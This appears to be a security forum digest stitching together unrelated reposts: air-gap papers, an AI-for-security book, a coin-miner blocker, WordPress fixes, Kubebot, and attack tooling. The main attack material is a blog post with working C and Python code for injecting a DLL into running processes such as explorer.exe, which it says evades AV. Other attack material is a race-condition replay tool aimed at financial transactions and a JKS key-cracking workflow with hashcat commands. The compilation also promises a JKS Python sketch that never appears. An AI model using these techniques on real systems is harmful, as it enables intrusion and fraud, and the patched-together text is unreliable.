Demo video: https://www.youtube.com/watch?v=E28V1t-k8Hk

LED-it-GO (Optical)
Mordechai Guri, Boris Zadov, Yuval Elovici. "LED-it-GO: Leaking (A Lot of) Data from Air-Gapped Computers via the (Small) Hard Drive LED". Detection of Intrusions and Malware, and Vulnerability Assessment - 14th International Conference, DIMVA 2017: 161-184.
Mordechai Guri, Boris Zadov, Eran Atias, and Yuval Elovici. "LED-it-GO: Leaking (a lot of) Data from Air-Gapped Computers via the (small) Hard Drive LED." arXiv preprint arXiv:1702.06715 (2017).
Demo video: https://www.youtube.com/watch?v=4vIu8ld68fc

VisiSploit (Optical)
Mordechai Guri, Ofer Hasson, Gabi Kedma, and Yuval Elovici. "An optical covert-channel to leak data through an air-gap." In Privacy, Security and Trust (PST), 2016 14th Annual Conference on, pp. 642-649. IEEE, 2016.
Mordechai Guri, Ofer Hasson, Gabi Kedma, and Yuval Elovici. "VisiSploit: An Optical Covert-Channel to Leak Data through an Air-Gap." arXiv preprint arXiv:1607.03946 (2016).

Attachment: xLED-Router-Guri.pdf
Link: http://cyber.bgu.ac.il/advanced-cyber/airgap
-
The information security world is rich with information. From reviewing logs to analyzing malware, information is everywhere and in vast quantities, more than the workforce can cover. Artificial intelligence is a field of study that is adept at applying intelligence to vast amounts of data and deriving meaningful results. In this book, we will cover machine learning techniques in practical situations to improve your ability to thrive in a data-driven world. With clustering, we will explore grouping items and identifying anomalies. With classification, we'll cover how to train a model to distinguish between classes of inputs. In probability, we'll answer the question "What are the odds?" and make use of the results. With deep learning, we'll dive into the powerful biology-inspired realms of AI that power some of the most effective methods in machine learning today.

The Cylance Data Science team consists of experts in a variety of fields. Contributing members from this team for this book include Brian Wallace, a security researcher turned data scientist with a propensity for building tools that merge the worlds of information security and data science. Sepehr Akhavan-Masouleh is a data scientist who works on the application of statistical and machine learning models in cyber-security, with a Ph.D. from the University of California, Irvine. Andrew Davis is a neural network wizard wielding a Ph.D. in computer engineering from the University of Tennessee. Mike Wojnowicz is a data scientist with a Ph.D. from Cornell University who enjoys developing and deploying large-scale probabilistic models due to their interpretability. Data scientist John H. Brock researches applications of machine learning to static malware detection and analysis, holds an M.S. in computer science from the University of California, Irvine, and can usually be found debugging Lovecraftian open source code while mumbling to himself about the virtues of unit testing.

Download: http://defense.ballastsecurity.net/static/IntroductionToArtificialIntelligenceForSecurityProfessionals_Cylance.pdf
-
No Coin

No Coin is a tiny browser extension aiming to block coin miners such as Coinhive.

You can grab the extension from:
Chrome Web Store
FireFox Add-on (coming soon)

Why?

Even though I think using coin mining in the browser to monetize content is a great idea, abusing it is not. Some websites run it during the entire browsing session, which results in high consumption of your computer's resources. I do believe that using it occasionally, such as for the proof of work of a captcha, is OK. But for an entire browsing session, the user should have the choice to opt in, which is the aim of this extension.

Why not just block the URLs in an adblocker?

The idea was to keep it separate from adblocking. Coin mining in the browser is a different issue. Whereas ads track you and visually interfere with your browsing experience, coin mining, if abused, eats your computer's resources, resulting in slowdowns (from high CPU usage) and excessive power consumption. You might be OK with one and not the other, or vice versa. Or you might just want to keep ads blocked entirely and enable the coin mining script for a minute to pass a captcha. That's why I believe having a separate extension is useful.

How does it work?

The extension simply blocks a list of blacklisted domains in blacklist.txt. Clicking on the icon will display a button to pause/unpause No Coin. If you are aware of any scripts or services that provide coin mining in the browser, please submit a PR.

Contribute

Contributions are welcome! Don't hesitate to submit bug fixes, improvements and new features. Regarding new features, please have a look at the issues first. If a feature you wish to work on is not listed there, you might want to add an issue before starting to work on a PR.

Made by Rafael Keramidas (keraf [at] protonmail [dot] com - @iamkeraf - ker.af). Image used for logo by Sandro Pereira.

Sursa: https://github.com/keraf/NoCoin
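The blocking decision itself is tiny. The real extension implements it in JavaScript against the chrome.webRequest API; the Python sketch below only mirrors the matching step, and the blacklist entries are illustrative.

from urllib.parse import urlparse

BLACKLIST = {"coin-hive.com", "coinhive.com"}  # illustrative entries

def should_block(url):
    # Block when the request host equals a blacklisted domain
    # or is a subdomain of one.
    host = urlparse(url).hostname or ""
    return any(host == d or host.endswith("." + d) for d in BLACKLIST)

print(should_block("https://coinhive.com/lib/coinhive.min.js"))  # True
print(should_block("https://example.org/app.js"))                # False

A pause/unpause toggle then reduces to skipping this check while paused, which is essentially what the icon button does.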
-
-
-
-
Are there really people who read the "Terms and conditions"? Or the "Privacy policy"?
-
Abusing Delay Load DLLs for Remote Code Injection

Sep 19th, 2017

I always tell myself that I'll try posting more frequently on my blog, and yet here I am, two years later. Perhaps this post will provide the necessary motivation to conduct more public research. I do love it.

This post details a novel remote code injection technique I discovered while playing around with delay loading DLLs. It allows for the injection of arbitrary code into arbitrary remote, running processes, provided that they implement the abused functionality. To make it abundantly clear, this is not an exploit, it's simply another strategy for migrating into other processes.

Modern code injection techniques typically rely on a variation of two different win32 API calls: CreateRemoteThread and NtQueueApc. Endgame recently put out a great article[0] detailing ten different methods of process injection. While not all of them allow for injection into remote processes, particularly those already running, it does detail the most common, public variations. This strategy is more akin to inline hooking, though we're not touching the IAT and we don't require our code to already be in the process. There are no calls to NtQueueApc or CreateRemoteThread, and no need for thread or process suspension. There are some limitations, as with anything, which I'll detail below.

Delay Load DLL

Delay loading is a linker strategy that allows for the lazy loading of DLLs. Executables commonly load all necessary dynamically linked libraries at runtime and perform the IAT fix-ups then. Delay loading, however, allows for these libraries to be lazy loaded at call time, supported by a pseudo IAT that's fixed up on first call. This process is nicely illustrated by a decades-old figure in a great Microsoft article released in 1998 [1] that describes the strategy quite well, but I'll attempt to distill it here.

Portable executables contain a data directory named IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT, which you can see using dumpbin /imports or using windbg. The structure of this entry is described in delayhlp.cpp, included with the WinSDK:

struct InternalImgDelayDescr
{
    DWORD           grAttrs;        // attributes
    LPCSTR          szName;         // pointer to dll name
    HMODULE *       phmod;          // address of module handle
    PImgThunkData   pIAT;           // address of the IAT
    PCImgThunkData  pINT;           // address of the INT
    PCImgThunkData  pBoundIAT;      // address of the optional bound IAT
    PCImgThunkData  pUnloadIAT;     // address of optional copy of original IAT
    DWORD           dwTimeStamp;    // 0 if not bound,
                                    // O.W. date/time stamp of DLL bound to (Old BIND)
};

The table itself contains RVAs, not pointers. We can find the delay directory offset by parsing the file header:

0:022> lm m explorer
start    end        module name
00690000 00969000   explorer   (pdb symbols)
0:022> !dh 00690000 -f

File Type: EXECUTABLE IMAGE
FILE HEADER VALUES
[...]
68A80 [      40] address [size] of Load Configuration Directory
    0 [       0] address [size] of Bound Import Directory
 1000 [     D98] address [size] of Import Address Table Directory
AC670 [     140] address [size] of Delay Import Directory
    0 [       0] address [size] of COR20 Header Directory
    0 [       0] address [size] of Reserved Directory

The first entry and its delay-linked DLL can be seen in the following:

0:022> dd 00690000+ac670 l8
0073c670 00000001 000ac7b0 000b24d8 000b1000
0073c680 000ac8cc 00000000 00000000 00000000
0:022> da 00690000+000ac7b0
0073c7b0 "WINMM.dll"

This means that WINMM is dynamically linked to explorer.exe, but delay loaded, and will not be loaded into the process until the imported function is invoked. Once loaded, a helper function fixes up the pseudo IAT by using GetProcAddress to locate the desired function and patching the table at runtime.

The pseudo IAT referenced is separate from the standard PE IAT; this IAT is specifically for the delay load functions, and is referenced from the delay descriptor. So for example, in WINMM.dll's case, the pseudo IAT for WINMM is at RVA 000b1000. The second delay descriptor entry would have a separate RVA for its pseudo IAT, and so on and so forth.

Using WINMM as our delay example, explorer imports one function from it, PlaySoundW. In my particular running instance, it has not been invoked, so the pseudo IAT has not been fixed up yet. We can see this by dumping its pseudo IAT entry:

0:022> dps 00690000+000b1000 l2
00741000 006dd0ac explorer!_imp_load__PlaySoundW
00741004 00000000

Each DLL entry is null terminated. The above pointer shows us that the existing entry is merely a springboard thunk within the Explorer process. This takes us here:

0:022> u explorer!_imp_load__PlaySoundW
explorer!_imp_load__PlaySoundW:
006dd0ac b800107400      mov  eax,offset explorer!_imp__PlaySoundW (00741000)
006dd0b1 eb00            jmp  explorer!_tailMerge_WINMM_dll (006dd0b3)
explorer!_tailMerge_WINMM_dll:
006dd0b3 51              push ecx
006dd0b4 52              push edx
006dd0b5 50              push eax
006dd0b6 6870c67300      push offset explorer!_DELAY_IMPORT_DESCRIPTOR_WINMM_dll (0073c670)
006dd0bb e8296cfdff      call explorer!__delayLoadHelper2 (006b3ce9)

The tailMerge function is a linker-generated stub that's compiled in per-DLL, not per function. The __delayLoadHelper2 function is the magic that handles the loading and patching of the pseudo IAT. Documented in delayhlp.cpp, this function handles calling LoadLibrary/GetProcAddress and patching the pseudo IAT. As a demonstration of how this looks, I compiled a binary that delay links dnslib. Here's the process of resolution of DnsAcquireContextHandle:

0:000> dps 00060000+0001839c l2
0007839c 000618bd DelayTest!_imp_load_DnsAcquireContextHandle_W
000783a0 00000000
0:000> bp DelayTest!__delayLoadHelper2
0:000> g
ModLoad: 753e0000 7542c000   C:\Windows\system32\apphelp.dll
Breakpoint 0 hit
[...]
0:000> dd esp+4 l1
0024f9f4  00075ffc
0:000> dd 00075ffc l4
00075ffc  00000001 00010fb0 000183c8 0001839c
0:000> da 00060000+00010fb0
00070fb0  "DNSAPI.dll"
0:000> pt
0:000> dps 00060000+0001839c l2
0007839c  74dfd0fc DNSAPI!DnsAcquireContextHandle_W
000783a0  00000000

Now the pseudo IAT entry has been patched up and the correct function is invoked on subsequent calls.
This has the additional side effect of leaving the pseudo IAT both executable and writable:

0:011> !vprot 00060000+0001839c
BaseAddress:       00371000
AllocationBase:    00060000
AllocationProtect: 00000080  PAGE_EXECUTE_WRITECOPY

At this point, the DLL has been loaded into the process and the pseudo IAT patched up. In another twist, not all functions are resolved on load, only the one that is invoked. This leaves certain entries in the pseudo IAT in a mixed state:

00741044 00726afa explorer!_imp_load__UnInitProcessPriv
00741048 7467f845 DUI70!InitThread
0074104c 00726b0f explorer!_imp_load__UnInitThread
00741050 74670728 DUI70!InitProcessPriv
0:022> lm m DUI70
start    end        module name
74630000 746e2000   DUI70      (pdb symbols)

In the above, two of the four functions are resolved and the DUI70.dll library is loaded into the process. Each entry of the delay load descriptor maintains an RVA to the HMODULE (the structure referenced above). If the module isn't loaded, it will be null. So when a delayed function is invoked that's already loaded, the delay helper function will check its entry to determine if a handle to it can be used:

HMODULE hmod = *idd.phmod;
if (hmod == 0) {
    if (__pfnDliNotifyHook2) {
        hmod = HMODULE(((*__pfnDliNotifyHook2)(dliNotePreLoadLibrary, &dli)));
    }
    if (hmod == 0) {
        hmod = ::LoadLibraryEx(dli.szDll, NULL, 0);
    }

The idd structure is just an instance of the InternalImgDelayDescr described above, passed into the __delayLoadHelper2 function from the linker tailMerge stub. So if the module is already loaded, as referenced from the delay entry, it uses that handle instead. It does NOT attempt to LoadLibrary regardless of this value; this can be used to our advantage.

Another note here is that the delay loader supports notification hooks. There are six states we can hook into: processing start, pre load library, fail load library, pre GetProcAddress, fail GetProcAddress, and end processing. You can see how the hooks are used in the above code sample.

Finally, in addition to delay loading, the portable executable also supports delay library unloading. It works pretty much how you'd expect it, so we won't be touching on it here.

Limitations

Before detailing how we might abuse this (though it should be fairly obvious), it's important to note the limitations of this technique. It is not completely portable, and using pure delay load functionality it cannot be made to be so.

The glaring limitation is that the technique requires the remote process to be delay linked. A brief crawl of some local processes on my host shows many Microsoft applications are: dwm, explorer, cmd. Many non-Microsoft applications are as well, including Chrome. It is additionally a well supported feature of the portable executable format, and exists today on modern systems.

Another limitation is that, because at its core it relies on LoadLibrary, there must exist a DLL on disk. There is no way to LoadLibrary from memory (unless you use one of the countless techniques to do that, but none of which use LoadLibrary...).

In addition to implementing the delay load, the remote process must implement functionality that can be triggered. Instead of doing a CreateRemoteThread, SendNotifyMessage, or ResumeThread, we rely on the fetch to the pseudo IAT, and thus we must be able to trigger the remote process into performing this action/executing this function.
This is generally pretty easy if you're using the suspended process/new process strategy, but may not be trivial on running applications.

Finally, any process that does not allow unsigned libraries to be loaded will block this technique. This is controlled by ProcessSignaturePolicy and can be set with SetProcessMitigationPolicy[2]; it is unclear how many apps are using this at the moment, but Microsoft Edge was one of the first big products to employ this policy. This technique is also impacted by the ProcessImageLoadPolicy policy, which can be set to restrict loading of images from a UNC share.

Abuse

When discussing an ability to inject code into a process, there are three separate cases an attacker may consider, and some additional edge situations within remote processes. Local process injection is simply the execution of shellcode/arbitrary code within the current process. Suspended process injection is the act of spawning a new, suspended process from an existing, controlled one and injecting code into it. This is a fairly common strategy to employ for migrating code, setting up backup connections, or establishing a known process state prior to injection. The final case is the running remote process.

The running remote process is an interesting case with several caveats that we'll explore below. I won't detail suspended processes, as it's essentially the same as a running process, but easier. It's easier because many applications actually just load the delay library at runtime, either because the functionality is environmentally keyed and required then, or because another loaded DLL is linked against it and requires it. Refer to the source code for the project for an implementation of suspended process injection [3].

Local Process

The local process is the simplest case, and arguably the most useless for this strategy. If we can inject and execute code in this manner, we might as well link against the library we want to use. It serves as a fine introduction to the topic, though.

The first thing we need to do is delay link the executable against something. For various reasons I originally chose dnsapi.dll. You can specify delay load DLLs via the linker options for Visual Studio. With that, we need to obtain the RVA for the delay directory. This can be accomplished with the following function:

IMAGE_DELAYLOAD_DESCRIPTOR* findDelayEntry(char *cDllName)
{
    PIMAGE_DOS_HEADER pImgDos = (PIMAGE_DOS_HEADER)GetModuleHandle(NULL);
    PIMAGE_NT_HEADERS pImgNt = (PIMAGE_NT_HEADERS)((LPBYTE)pImgDos + pImgDos->e_lfanew);
    PIMAGE_DELAYLOAD_DESCRIPTOR pImgDelay = (PIMAGE_DELAYLOAD_DESCRIPTOR)((LPBYTE)pImgDos +
        pImgNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].VirtualAddress);
    DWORD dwBaseAddr = (DWORD)GetModuleHandle(NULL);
    IMAGE_DELAYLOAD_DESCRIPTOR *pImgResult = NULL;

    // iterate over entries
    for (IMAGE_DELAYLOAD_DESCRIPTOR* entry = pImgDelay; entry->ImportAddressTableRVA != NULL; entry++){
        char *_cDllName = (char*)(dwBaseAddr + entry->DllNameRVA);
        if (strcmp(_cDllName, cDllName) == 0){
            pImgResult = entry;
            break;
        }
    }

    return pImgResult;
}

Should be pretty clear what we're doing here.
Once we've got the correct table entry, we need to mark the entry's DllName as writable, overwrite it with our custom DLL name, and restore the protection mask:

IMAGE_DELAYLOAD_DESCRIPTOR *pImgDelayEntry = findDelayEntry("DNSAPI.dll");
DWORD dwEntryAddr = (DWORD)((DWORD)GetModuleHandle(NULL) + pImgDelayEntry->DllNameRVA);
VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), PAGE_READWRITE, &dwOldProtect);
WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwEntryAddr, (LPVOID)ndll, strlen(ndll), &wroteBytes);
VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), dwOldProtect, &dwOldProtect);

Now all that's left to do is trigger the targeted function. Once triggered, the delay helper function will snag the DllName from the table entry and load the DLL via LoadLibrary.

Remote Process

The most interesting of cases is the running remote process. For demonstration here, we'll be targeting explorer.exe, as we can almost always rely on it to be running on a workstation under the current user.

With an open handle to the explorer process, we must perform the same searching tasks as we did for the local process, but this time in a remote process. This is a little more cumbersome, but the code can be found in the project repository for reference[3]. We simply grab the remote PEB, parse the image and its directories, and locate the appropriate delay entry we're targeting. This part is likely to prove the most unfriendly when attempting to port this to another process: what functionality are we targeting? What function or delay load entry is generally unused, but triggerable from the current session?

With explorer there are several options; it's delay linked against 9 different DLLs, each averaging 2-3 imported functions. Thankfully, one of the first functions I looked at was pretty straightforward: CM_Request_Eject_PC. This function, exported by CFGMGR32.dll, requests that the system be ejected from the local docking station[4]. We can therefore assume that it's likely to be available and not fixed up on workstations, and potentially unfixed on laptops, should the user never explicitly request the system to be ejected.

When we request for the workstation to be ejected from the docking station, the function sends a PNP request. We use the IShellDispatch object to execute this, which is accessed via Shell, handled by, you guessed it, explorer. The code for this is pretty simple:

HRESULT hResult = S_FALSE;
IShellDispatch *pIShellDispatch = NULL;

CoInitialize(NULL);

hResult = CoCreateInstance(CLSID_Shell, NULL, CLSCTX_INPROC_SERVER,
                           IID_IShellDispatch, (void**)&pIShellDispatch);
if (SUCCEEDED(hResult))
{
    pIShellDispatch->EjectPC();
    pIShellDispatch->Release();
}

CoUninitialize();

Our DLL only needs to export CM_Request_Eject_PC for us to not crash the process; we can either pass on the request to the real DLL, or simply ignore it. This leads us to stable and reliable remote code injection.

Remote Process – All Fixed

One interesting edge case is a remote process that you want to inject into via delay loading, but all imported functions have been resolved in the pseudo IAT. This is a little more complicated, but all hope is not lost. Remember when I mentioned earlier that a handle to the delay load library is maintained in its descriptor? This is the value that the helper function checks for to determine if it should reload the module or not; if it's null, it attempts to load it, if it's not, it uses that handle.
We can abuse this check by nulling out the module handle, thereby "tricking" the helper function into once again loading that descriptor's DLL. In the discussed case, however, the pseudo IAT is all patched up; there are no more trampolines into the delay load helper function. Helpfully, the pseudo IAT is writable by default, so we can simply patch in the trampoline function ourselves and have it instantiate the descriptor all over again.

In short, this worst-case strategy requires three separate WriteProcessMemory calls: one to null out the module handle, one to overwrite the pseudo IAT entry, and one to overwrite the loaded DLL name (a hedged sketch of this pattern follows at the end of this post).

Conclusions

I should mention that I tested this strategy across several next-gen AV/HIPS appliances, which will go unnamed here, and none were able to detect the cross-process injection strategy. Overall, it seems to pose an interesting detection challenge; in remote processes, the strategy uses the following chain of calls:

OpenProcess(..);
ReadRemoteProcess(..); // read image
ReadRemoteProcess(..); // read delay table
ReadRemoteProcess(..); // read delay entry 1...n
VirtualProtectEx(..);
WriteRemoteProcess(..);

That's it. The trigger functionality varies from process to process, and the loaded library would be loaded via supported and well-known Windows facilities. I checked out a few other core Windows applications, and they all have pretty straightforward trigger strategies.

The referenced project[3] includes both x86 and x64 support, and has been tested across Windows 7, 8.1, and 10. It includes three functions of interest: inject_local, inject_suspended, and inject_explorer. It expects to find the DLL at C:\Windows\Temp\TestDLL.dll, but this can obviously be changed. Note that it isn't production quality; beware, here be dragons.

Special thanks to Stephen Breen for reviewing this post.

References

[0] https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
[1] https://www.microsoft.com/msj/1298/hood/hood1298.aspx
[2] https://msdn.microsoft.com/en-us/library/windows/desktop/hh769088(v=vs.85).aspx
[3] https://github.com/hatRiot/DelayLoadInject
[4] https://msdn.microsoft.com/en-us/library/windows/hardware/ff539811(v=vs.85).aspx

Posted by Bryan Alexander Sep 19th, 2017

Sursa: http://hatriot.github.io/blog/2017/09/19/abusing-delay-load-dll/
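As promised above, here is a minimal Python/ctypes sketch of the three-write pattern for the "all fixed" case. This is not the referenced project's code: the process handle and the four remote addresses (module-handle slot, resolved pseudo IAT entry, tailMerge stub, and DLL name string) are assumed to have been located already via the remote PE parsing the post describes.

import ctypes
from ctypes import wintypes

PAGE_EXECUTE_READWRITE = 0x40
k32 = ctypes.WinDLL("kernel32", use_last_error=True)

def write_remote(hproc, addr, data):
    # Flip protections, write bytes into the remote process, restore.
    old = wintypes.DWORD(0)
    k32.VirtualProtectEx(hproc, ctypes.c_void_p(addr), len(data),
                         PAGE_EXECUTE_READWRITE, ctypes.byref(old))
    written = ctypes.c_size_t(0)
    ok = k32.WriteProcessMemory(hproc, ctypes.c_void_p(addr), data,
                                len(data), ctypes.byref(written))
    k32.VirtualProtectEx(hproc, ctypes.c_void_p(addr), len(data),
                         old.value, ctypes.byref(old))
    return bool(ok)

def retrigger_delay_load(hproc, hmod_slot, iat_entry, stub_addr,
                         name_addr, new_dll, ptr_size=8):
    # All addresses are assumed recovered beforehand; ptr_size is 4 on x86.
    # 1. null the cached HMODULE so the helper reloads the library
    write_remote(hproc, hmod_slot, b"\x00" * ptr_size)
    # 2. point the resolved pseudo IAT entry back at the tailMerge stub
    write_remote(hproc, iat_entry, stub_addr.to_bytes(ptr_size, "little"))
    # 3. swap the descriptor's DLL name string for our own on-disk DLL
    write_remote(hproc, name_addr, new_dll.encode() + b"\x00")

After these three writes, invoking the trigger function once more sends execution back through __delayLoadHelper2, which loads the attacker-named DLL exactly as in the simpler cases.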
-
Sakurity Racer

This 128 LOC extension works pretty much as a "Make Money" button if used properly.

LEGAL: Use at your own risk and only with your own projects. Do not use it against anyone else.

Load this unpacked extension into your Chrome. We didn't upload it to the Chrome Store because for best results you need to run your own racer.js server anyway.

See the circle on the right? It's the sniffer button. Once you click it, for the next 3 seconds all requests (except ignored ones like OPTIONS) will be blocked and sent to the specified default_server location where racer.js is running. Racer.js will get the exact same request you were about to make, along with all credentials and cookies, and will replay it to the victim in parallel (5 copies by default). That can trigger a race condition. No luck? Try a few times, because most race conditions are hard to reproduce.

For basic tests you can run racer.js on your localhost, which is used by default. For a real pentest, run it on a server as close to the victim as possible and change default_server inside sniffer.js.

The best functionality to pentest: financial transfers, vouchers, discount codes, trade/withdraw functions and other actions that you're supposed to perform a limited number of times. It doesn't cover all scenarios, such as timed race conditions or cases where you need to run a few different requests to achieve the result.

Sursa: https://github.com/sakurity/racer
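To see why near-simultaneous replay matters, here is a minimal Python sketch in the spirit of racer.js (which itself is JavaScript): it lines up N identical copies of a captured request behind a barrier and fires them at once. The endpoint, cookies, and body are placeholders for a request you are authorized to test, and the third-party requests package is assumed to be installed.

import threading
from concurrent.futures import ThreadPoolExecutor
import requests  # third-party: pip install requests

N = 5
barrier = threading.Barrier(N)

def fire(_):
    barrier.wait()  # release all workers together to maximize overlap
    r = requests.post(
        "https://target.example/transfer",           # hypothetical endpoint
        cookies={"session": "captured-session-id"},  # hypothetical credentials
        data={"amount": "1", "to": "attacker"},      # hypothetical body
        timeout=10,
    )
    return r.status_code

with ThreadPoolExecutor(max_workers=N) as pool:
    print(list(pool.map(fire, range(N))))

If the server-side check-then-act sequence (e.g., "balance sufficient? then debit") is not serialized, several of the overlapping requests can pass the check before any of them acts, which is exactly the window the extension probes for.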
-
-
-
-
-
Kubebot: A Kubernetes Based Security Testing Slackbot

Posted by @pentestit

About a week ago, I blogged about List of Portable Hardware Devices for Penetration Testing. The tool that I am blogging about today – Kubebot – can be an awesome example and can be installed very easily on a Raspberry Pi that you have lying around. The best part is that it is open source and can be customized to do anything you want.

What is Kubebot?

Kubebot is an open source security testing Slackbot written in the Go programming language, with a Kubernetes backend on the Google Cloud Platform. Kubernetes is an open-source system for automating deployment, scaling, and management of dockerized applications. We also know that running tasks such as reconnaissance on a target network is almost always time-consuming and cumbersome. With a tool like Kubebot to help, you can concentrate on other important work while it runs. It dockerizes a lot of useful tools that help you perform reconnaissance on a target.

List of tools included with Kubebot:

Enumall: This is a custom implementation of the Enumall script by the author. It helps you identify subdomains using several techniques that rely on services such as ThreatCrowd, Bing, Shodan, HackerTarget and the famous Recon-NG.
git-all-secrets: git-all-secrets is an open source tool by the author @anshuman_bh to capture all the GIT secrets by leveraging multiple open source GIT searching tools.
Gitrob: Gitrob is an open source, command line tool which can help organizations and security professionals find sensitive information lingering in publicly available files on GitHub.
git-secrets: The git-secrets open source tool scans commits and commit messages and alerts you of sensitive data that has been found.
Gobuster: Gobuster is a tool used to brute-force URIs (directories and files) in web sites and DNS subdomains (with wildcard support).
Nmap: All of us already know that Nmap aka Network Mapper is a free and open source utility for network discovery and security auditing.
SubBrute: SubBrute is a DNS meta-query spider that enumerates DNS records and subdomains.
Sublist3r: Sublist3r is an open source python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect subdomains for the domain they are targeting by enumerating them using many search engines such as Google, Yahoo, Bing, Baidu, and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster, and ReverseDNS. SubBrute was integrated with Sublist3r to increase the possibility of finding more subdomains using brute force with an improved wordlist.
truffleHog: truffleHog is an open source tool that searches through GIT repositories for high entropy strings, digging deep into commit history and branches. This is effective at finding secrets accidentally committed that contain high entropy.
Wfuzz: Wfuzz is a tool designed to brute force web applications. As of now, only basic authentication brute forcing has been implemented in Kubebot.

Support for tools such as Metasploit is being worked upon. Installing the tool, though lengthy, is easy.

Download Kubebot:

Installation instructions along with the prerequisites can be found here. You can check out the Kubebot GIT repository from here.

Sursa: http://pentestit.com/kubebot-kubernetes-based-security-testing-slackbot/
-
Cure53 Browser Security White Paper

Welcome to the code repository for the Cure53 Browser Security White Paper! This is the right place to leave comments and file bugs in case we got something wrong. The latest version of the PDF will be available here as well. Expect frequent updates for smaller fixes and adjustments.

Sursa: https://github.com/cure53/browser-sec-whitepaper
-
-
-
-
WordPress 4.8.2 Security and Maintenance Release

Posted September 19, 2017 by Aaron D. Campbell. Filed under Releases, Security.

WordPress 4.8.2 is now available. This is a security release for all previous versions and we strongly encourage you to update your sites immediately.

WordPress versions 4.8.1 and earlier are affected by these security issues:

$wpdb->prepare() can create unexpected and unsafe queries leading to potential SQL injection (SQLi). WordPress core is not directly vulnerable to this issue, but we've added hardening to prevent plugins and themes from accidentally causing a vulnerability. Reported by Slavco.
A cross-site scripting (XSS) vulnerability was discovered in the oEmbed discovery. Reported by xknown of the WordPress Security Team.
A cross-site scripting (XSS) vulnerability was discovered in the visual editor. Reported by Rodolfo Assis (@brutelogic) of Sucuri Security.
A path traversal vulnerability was discovered in the file unzipping code. Reported by Alex Chapman (noxrnet).
A cross-site scripting (XSS) vulnerability was discovered in the plugin editor. Reported by 陈瑞琦 (Chen Ruiqi).
An open redirect was discovered on the user and term edit screens. Reported by Yasin Soliman (ysx).
A path traversal vulnerability was discovered in the customizer. Reported by Weston Ruter of the WordPress Security Team.
A cross-site scripting (XSS) vulnerability was discovered in template names. Reported by Luka (sikic).
A cross-site scripting (XSS) vulnerability was discovered in the link modal. Reported by Anas Roubi (qasuar).

Thank you to the reporters of these issues for practicing responsible disclosure.

In addition to the security issues above, WordPress 4.8.2 contains 6 maintenance fixes to the 4.8 release series. For more information, see the release notes or consult the list of changes.

Download WordPress 4.8.2 or venture over to Dashboard → Updates and simply click "Update Now." Sites that support automatic background updates are already beginning to update to WordPress 4.8.2.

Thanks to everyone who contributed to 4.8.2.

Sursa: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
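As a generic illustration of the vulnerability class behind the first item (this is not WordPress code, and not the actual $wpdb->prepare() internals), the Python/sqlite3 sketch below contrasts splicing untrusted input into the SQL text with passing it as a bound parameter:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cr3t')")

user_input = "x' OR '1'='1"  # attacker-controlled value

# Unsafe: the value becomes part of the SQL text and changes the query.
unsafe = "SELECT secret FROM users WHERE name = '%s'" % user_input
print(conn.execute(unsafe).fetchall())  # [('s3cr3t',)] -- injection succeeds

# Safe: the value travels as a bound parameter, never as SQL.
safe = "SELECT secret FROM users WHERE name = ?"
print(conn.execute(safe, (user_input,)).fetchall())  # [] -- no injection

The 4.8.2 hardening addresses the analogous risk in PHP: query templates assembled from attacker-influenced text can subvert even a prepare-style API, so untrusted data must only ever enter as parameters.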
-
JKS private key cracker - Nail in the JKS coffin

The Java Key Store (JKS) is the Java way of storing one or several cryptographic private and public keys for asymmetric cryptography in a file. While there are various key store formats, Java and Android still default to the JKS file format. JKS is one of the file formats for Java key stores, but JKS is confusingly used as the acronym for the general Java key store API as well. This project includes information regarding the security mechanisms of the JKS file format and how the password protection of the private key can be cracked. Due to the unusual design of JKS, the developed implementation can ignore the key store password and crack the private key password directly. Because it ignores the key store password, this implementation can attack every JKS configuration, which is not the case with most other tools.

By exploiting a weakness of the Password Based Encryption scheme for the private key in JKS, passwords can be cracked very efficiently. Until now, no public tool was available exploiting this weakness. This technique was implemented in hashcat to amplify the efficiency of the algorithm with higher cracking speeds on GPUs. (A toy Python sketch of the underlying single-SHA-1 check is included at the end of this post.)

To get the theory part, please refer to the POC||GTFO article "15:12 Nail in the Java Key Store Coffin" in issue 0x15, included in this repository (pocorgtfo15.pdf) or available on various mirrors like this beautiful one: https://unpack.debug.su/pocorgtfo/

Before you ask: JCEKS or BKS or any other Key Store format is not supported (yet).

How you should crack JKS files

The answer is: build your own cracking hardware for it. But let's be a little more practical, so the answer is: use your GPU. All you need to do is run the following command:

java -jar JksPrivkPrepare.jar your_JKS_file.jks > hash.txt

If your hash.txt ends up being empty, there is either no private key in the JKS file or you specified a non-JKS file. Then feed the hash.txt file to hashcat (version 3.6.0 and above), for example like this:

$ ./hashcat -m 15500 -a 3 -1 '?u|' -w 3 hash.txt ?1?1?1?1?1?1?1?1?1
hashcat (v3.6.0) starting...
OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1080, 2026/8107 MB allocatable, 20MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Precompute-Init
* Not-Iterated
* Appended-Salt
* Single-Hash
* Single-Salt
* Brute-Force

Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 75c

$jksprivk$*D1BC102EF5FE5F1A7ED6A63431767DD4E1569670...8*test:POC||GTFO

Session..........: hashcat
Status...........: Cracked
Hash.Type........: JKS Java Key Store Private Keys (SHA1)
Hash.Target......: $jksprivk$*D1BC102EF5FE5F1A7ED6A63431767DD4E1569670...8*test
Time.Started.....: Tue May 30 17:41:58 2017 (8 mins, 25 secs)
Time.Estimated...: Tue May 30 17:50:23 2017 (0 secs)
Guess.Mask.......: ?1?1?1?1?1?1?1?1?1 [9]
Guess.Charset....: -1 ?u|, -2 Undefined, -3 Undefined, -4 Undefined
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 7946.6 MH/s (39.48ms)
